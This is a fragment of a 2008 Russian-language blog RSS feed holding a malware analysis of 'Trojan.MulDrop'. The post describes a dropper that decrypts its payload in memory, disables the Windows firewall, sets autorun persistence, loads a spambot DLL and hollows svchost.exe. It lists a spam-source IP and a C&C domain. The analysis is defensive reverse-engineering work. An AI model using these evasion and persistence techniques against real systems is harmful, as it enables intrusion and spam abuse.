/&gt;e_gmax@mail.ru</description><link>http://gmax-blog.blogspot.com/2008/12/trojan-downloaderwin32agentapoa.html</link><author>noreply@blogger.com (GMax)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNGzZFAnKSWM88oAGf3YHLmSfB57UFW5JNuI43dof7uoz7b82NDEcVT1YXXpoKAyTjg1T-QiqdTryECBZlKa83gye2GhGf8G3p-NgWoiZkgbpXye4fNoCAinf_gfldAzMcRfP3ev86YQ4/s72-c/01.JPG" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7303348839427374548.post-2459358190360572357</guid><pubDate>Fri, 26 Dec 2008 17:46:00 +0000</pubDate><atom:updated>2008-12-26T13:03:33.184-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">malware</category><category domain="http://www.blogger.com/atom/ns#">spambot</category><title>Trojan.MulDrop</title><description>Имя файла: update.exe&lt;br /&gt;Размер: 91 Кб&lt;br /&gt;Time/Date Stamp (GMT): 25 декабря 2008 г. 20:52:13&lt;br /&gt;&lt;a href=&quot;http://www.virustotal.com/ru/analisis/0e01b13d625121736f629f2191b07446&quot;&gt;http://www.virustotal.com/ru/analisis/0e01b13d625121736f629f2191b07446&lt;/a&gt; &lt;br /&gt;Первый слой представляет собой просто расшифровку основного тела программы с помощью пайпа (Pipe). Для получения нужных API функций используется оригинальный метод расшифровки строк (побуквенное копирование в локальный буфер с последующей расшифровкой, при таком подходе строки не хранятся в секции данных).&lt;a onblur=&quot;try {parent.deselectBloggerImageGracefully();} catch(e) {}&quot; href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRgJNCRW1gcXiAU2gXZjLjiorC7Z7Fz90uM2yjFl35k2DFgMKtHVbzI28VD-kk_OK_Bkpjio-alRgk0PZpGDzq_W3iFTkyPF8uWA3WA7W9825qHB4UkagbsiAwt2oe55VYG9MefhDOjys/s1600-h/01.GIF&quot;&gt;&lt;img style=&quot;display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 68px;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRgJNCRW1gcXiAU2gXZjLjiorC7Z7Fz90uM2yjFl35k2DFgMKtHVbzI28VD-kk_OK_Bkpjio-alRgk0PZpGDzq_W3iFTkyPF8uWA3WA7W9825qHB4UkagbsiAwt2oe55VYG9MefhDOjys/s400/01.GIF&quot; border=&quot;0&quot; alt=&quot;&quot;id=&quot;BLOGGER_PHOTO_ID_5284157360666011154&quot; /&gt;&lt;/a&gt;Хоть расшифрованная часть программы и является самостоятельным exe файлом (размером 82,5 Кб), файл не сохранятся на диск с последующим запуском, а настраивается и запускается самой программой установщиком.&lt;br /&gt;&lt;a href=&quot;http://www.virustotal.com/ru/analisis/1d10486223a29f2b635907ea8a8a7f3a&quot;&gt;http://www.virustotal.com/ru/analisis/1d10486223a29f2b635907ea8a8a7f3a&lt;/a&gt;&lt;br /&gt;При дальнейшем рассмотрении оказалось, что расшифрованная программа представляет собой обертку для установки еще двух программ (0.EXE, 1.EXE), которые хранятся в ресурсах программы. Обе копируются в директорию TEMP и запускаются на выполнение. Хотя нечего более программа не делает, в коде полно стандартных библиотечных функций Delphi, которые не используются.&lt;br /&gt;Имя файла: 0.EXE&lt;br /&gt;Размер: 43,5 Кб&lt;br /&gt;Time/Date Stamp (GMT): 25 декабря 2008 г. 19:07:49&lt;br /&gt;&lt;a href=&quot;http://www.virustotal.com/ru/analisis/3e3c8aa4f52f4ee6cd06e16301ff9b28&quot;&gt;http://www.virustotal.com/ru/analisis/3e3c8aa4f52f4ee6cd06e16301ff9b28&lt;/a&gt; &lt;br /&gt;Здесь применятся тот же “криптор”, что и в основной программе (расшифровка строк, инициализация импорта, расшифровка с помощью пайпов, запуск из памяти).&lt;br /&gt;Размер: 36,9 Кб&lt;br /&gt;Time/Date Stamp (GMT): 25 декабря 2008 г. 19:06:11&lt;br /&gt;&lt;a href=&quot;http://www.virustotal.com/ru/analisis/5ec71ddbf47b3e00166f824a7618a788&quot;&gt;http://www.virustotal.com/ru/analisis/5ec71ddbf47b3e00166f824a7618a788&lt;/a&gt;&lt;a onblur=&quot;try {parent.deselectBloggerImageGracefully();} catch(e) {}&quot; href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2ju26Od2CAhUuHVYDBFmkR5JV1u0M_zAsZZNpaEtbe5V7M1DpVhN1WT6IGHIKnMW5idMu8DpWdmLStXW2NRGTOH401tN9Ikl3o4O9jn8yXTmNVLGu1cm0A-148wZHmJvcLHLQxtLe1kc/s1600-h/02.JPG&quot;&gt;&lt;img style=&quot;display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 89px;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2ju26Od2CAhUuHVYDBFmkR5JV1u0M_zAsZZNpaEtbe5V7M1DpVhN1WT6IGHIKnMW5idMu8DpWdmLStXW2NRGTOH401tN9Ikl3o4O9jn8yXTmNVLGu1cm0A-148wZHmJvcLHLQxtLe1kc/s400/02.JPG&quot; border=&quot;0&quot; alt=&quot;&quot;id=&quot;BLOGGER_PHOTO_ID_5284157366238726258&quot; /&gt;&lt;/a&gt;Вначале расшифровываются имена функций и необходимые строки, затем находятся адреса API функций. С помощью bat файлов отключается встроенный брандмауэр Windows. Программа записывается в автозагрузку (“Software\Microsoft\Windows\CurrentVersion\run”), разрешает себе доступ в Интернет и каждые 5 секунд повторяет эти действия. В целом это &lt;a href=&quot;http://gmax-blog.blogspot.com/2008/12/trojanspambot-spm-v602.html&quot;&gt;Trojan.Spambot&lt;/a&gt; версии v508. Далее из секции данных расшифровывается очередная часть трояна, на этот раз это DLL. Библиотека загружается в память и вызывается экспортируемая функция load. &lt;br /&gt;Размер расшифрованной библиотеки: 25,5 Кб.&lt;br /&gt;Time/Date Stamp (GMT): 9 октября 2006 г. 21:32:06&lt;br /&gt;&lt;a href=&quot;http://www.virustotal.com/ru/analisis/5179d521778c3f776476634a038879d4&quot;&gt;http://www.virustotal.com/ru/analisis/5179d521778c3f776476634a038879d4&lt;/a&gt;&lt;br /&gt;Библиотека полностью идентична той что была в &lt;a href=&quot;http://gmax-blog.blogspot.com/2008/12/trojanspambot-spm-v602.html&quot;&gt;Trojan.Spambot&lt;/a&gt;, включая адрес откуда берется спам &lt;span style=&quot;font-weight:bold;&quot;&gt;66.232.109.178&lt;/span&gt;.&lt;br /&gt;Имя файла: 1.EXE&lt;br /&gt;Размер: 24,5 Кб&lt;br /&gt;Time/Date Stamp (GMT): 8 сентября 2008 г. 17:03:35&lt;br /&gt;&lt;a href=&quot;http://www.virustotal.com/ru/analisis/4681e13e0223e093e5be3f2d7050bc85&quot;&gt;http://www.virustotal.com/ru/analisis/4681e13e0223e093e5be3f2d7050bc85&lt;/a&gt; &lt;br /&gt;Файл сжат UPX. Размер после распаковки ~80 Кб. Код очень богат разнообразными экзотическими инструкциями. Первым делом инициализируется импорт. Затем запускается процесс svchost.exe в остановленном состоянии, копирует туда себя, меняет контекст процесса, и запускает. C&amp;C на сайте &lt;span style=&quot;font-weight:bold;&quot;&gt;tailormadeservers.com&lt;/span&gt;&lt;br /&gt;2008, GMax&lt;br /&gt;e_gmax@mail.ru</description><link>http://gmax-blog.blogspot.com/2008/12/trojanmuldrop.html</link><author>noreply@blogger.com (GMax)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRgJNCRW1gcXiAU2gXZjLjiorC7Z7Fz90uM2yjFl35k2DFgMKtHVbzI28VD-kk_OK_Bkpjio-alRgk0PZpGDzq_W3iFTkyPF8uWA3WA7W9825qHB4UkagbsiAwt2oe55VYG9MefhDOjys/s72-c/01.GIF" height="72" width="72"/><thr:total>0</thr:total></item></channel></rss>